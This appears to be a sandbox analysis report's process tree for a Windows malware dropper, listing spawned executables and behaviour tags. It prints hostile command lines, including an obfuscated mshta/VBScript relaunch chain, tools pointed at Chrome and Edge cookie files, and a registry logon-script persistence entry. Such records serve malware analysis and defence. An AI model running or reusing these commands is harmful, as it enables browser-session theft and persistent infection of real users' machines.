C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵PID:4836
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵PID:7900
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵PID:7512
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵PID:2152
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵PID:7468
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵PID:7624
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵PID:6468
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵PID:7424
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵PID:1476
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵PID:3124
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵PID:4172
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵PID:6936
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵PID:7024
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵PID:5244
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵PID:8008
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵PID:8084
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵PID:6376
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵PID:7880
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵PID:2016
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵PID:6652
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵PID:6352
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵PID:5828
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5556 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵PID:6692
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵PID:6880
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵PID:2584
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵PID:4384
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
PID:5664
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Documents\36GLc_Q4pa9kpAzWElBMRfUn.exe"C:\Users\Admin\Documents\36GLc_Q4pa9kpAzWElBMRfUn.exe"2⤵PID:5476
-
-
C:\Users\Admin\Documents\rDFuThgN6SXD3BHEaNB1t36C.exe"C:\Users\Admin\Documents\rDFuThgN6SXD3BHEaNB1t36C.exe"2⤵
- Executes dropped EXE
PID:5584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 3203⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6184
-
-
-
C:\Users\Admin\Documents\hJtw4KBQLvYEjDfyFh9nzb3P.exe"C:\Users\Admin\Documents\hJtw4KBQLvYEjDfyFh9nzb3P.exe"2⤵PID:5548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 2883⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1436
-
-
-
C:\Users\Admin\Documents\6qOZJwofMnPFV3X6H7S9RpsB.exe"C:\Users\Admin\Documents\6qOZJwofMnPFV3X6H7S9RpsB.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5804
-
-
C:\Users\Admin\Documents\DSbpoF6PGCusnRFF00jXGCvc.exe"C:\Users\Admin\Documents\DSbpoF6PGCusnRFF00jXGCvc.exe"2⤵
- Executes dropped EXE
PID:5796 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1580
-
-
-
C:\Users\Admin\Documents\TRwbhfZmDvsoQBUYytGmOFVr.exe"C:\Users\Admin\Documents\TRwbhfZmDvsoQBUYytGmOFVr.exe"2⤵
- Executes dropped EXE
PID:5788
-
-
C:\Users\Admin\Documents\vzi95zy8ZZnzYbaMPGMwbR9c.exe"C:\Users\Admin\Documents\vzi95zy8ZZnzYbaMPGMwbR9c.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5780 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵PID:6480
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6092
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5144
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2672
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵PID:6968
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵PID:4872
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1204
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7460
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2712
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7960
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3832
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6452
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3792
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3904
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6644
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3460
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5252
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6532
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7404
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3724
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1004
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7080
-
-
-
-
C:\Users\Admin\Documents\MIy7QAKWa3ISVejmQDbcEYfD.exe"C:\Users\Admin\Documents\MIy7QAKWa3ISVejmQDbcEYfD.exe"2⤵PID:5612
-
-
C:\Users\Admin\Documents\OrI2JUxI56YclSCqRUn4fBI4.exe"C:\Users\Admin\Documents\OrI2JUxI56YclSCqRUn4fBI4.exe"2⤵PID:5128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5792
-
-
-
C:\Users\Admin\Documents\w60Mqs3_BabitQSCHh7KQrkG.exe"C:\Users\Admin\Documents\w60Mqs3_BabitQSCHh7KQrkG.exe"2⤵
- Executes dropped EXE
PID:3820 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\w60Mqs3_BabitQSCHh7KQrkG.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\w60Mqs3_BabitQSCHh7KQrkG.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵PID:6248
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\w60Mqs3_BabitQSCHh7KQrkG.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\w60Mqs3_BabitQSCHh7KQrkG.exe" ) do taskkill -f -iM "%~NxA"4⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵PID:5628
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )6⤵
- Executes dropped EXE
PID:5128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵PID:7328
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵PID:8124
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "w60Mqs3_BabitQSCHh7KQrkG.exe"5⤵
- Kills process with taskkill
PID:2060
-
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv cn/NS3sAykWWWjTjoi6Wxg.0.21⤵
- Modifies data under HKEY_USERS
PID:4656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4768 -ip 47681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:3080
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:784 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:1772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 4643⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1772 -ip 17721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2748
-
C:\Users\Admin\AppData\Local\Temp\is-RJQVJ.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-RJQVJ.tmp\Inlog.tmp" /SL5="$102C2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\is-59H27.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-59H27.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7212⤵PID:6892
-
C:\Users\Admin\AppData\Local\Temp\is-JIJKV.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JIJKV.tmp\Setup.tmp" /SL5="$205E6,17367866,721408,C:\Users\Admin\AppData\Local\Temp\is-59H27.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7213⤵PID:6092
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-PF21O.tmp\{app}\microsoft.cab -F:* %ProgramData%4⤵PID:1644
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-PF21O.tmp\{app}\microsoft.cab -F:* C:\ProgramData5⤵PID:460
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f4⤵PID:7124
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f5⤵PID:6796
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"4⤵PID:2064
-
-
C:\Users\Admin\AppData\Local\Temp\is-PF21O.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-PF21O.tmp\{app}\vdi_compiler"4⤵PID:4384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 2965⤵
- Program crash
PID:7860
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7214⤵PID:1332
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=7215⤵PID:7264
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb4c8946f8,0x7ffb4c894708,0x7ffb4c8947186⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,6187115640644745122,1655866060977532287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:26⤵PID:4432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,6187115640644745122,1655866060977532287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:36⤵PID:6000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,6187115640644745122,1655866060977532287,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:86⤵PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,6187115640644745122,1655866060977532287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:16⤵
- Executes dropped EXE
PID:5404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,6187115640644745122,1655866060977532287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:16⤵PID:6108
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1256 -ip 12561⤵PID:2996
-
C:\Users\Admin\AppData\Local\Temp\is-4K5QG.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4K5QG.tmp\MediaBurner2.tmp" /SL5="$202C6,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\is-LNV6T.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-LNV6T.tmp\3377047_logo_media.exe" /S /UID=burnerch22⤵
- Executes dropped EXE
PID:5256 -
C:\Program Files\Windows Sidebar\BAKTZWKVFE\ultramediaburner.exe"C:\Program Files\Windows Sidebar\BAKTZWKVFE\ultramediaburner.exe" /VERYSILENT3⤵PID:6976
-
C:\Users\Admin\AppData\Local\Temp\is-M5DCP.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-M5DCP.tmp\ultramediaburner.tmp" /SL5="$4032A,281924,62464,C:\Program Files\Windows Sidebar\BAKTZWKVFE\ultramediaburner.exe" /VERYSILENT4⤵PID:2544
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵PID:5384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\96-09a1d-543-ab189-bc980c49ed5de\Ciduhoshoshi.exe"C:\Users\Admin\AppData\Local\Temp\96-09a1d-543-ab189-bc980c49ed5de\Ciduhoshoshi.exe"3⤵PID:7916
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:7760
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ffb4c8946f8,0x7ffb4c894708,0x7ffb4c8947185⤵PID:3216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1792 /prefetch:25⤵PID:1960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,16485578648484582825,8596682777629912703,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:35⤵PID:936
-
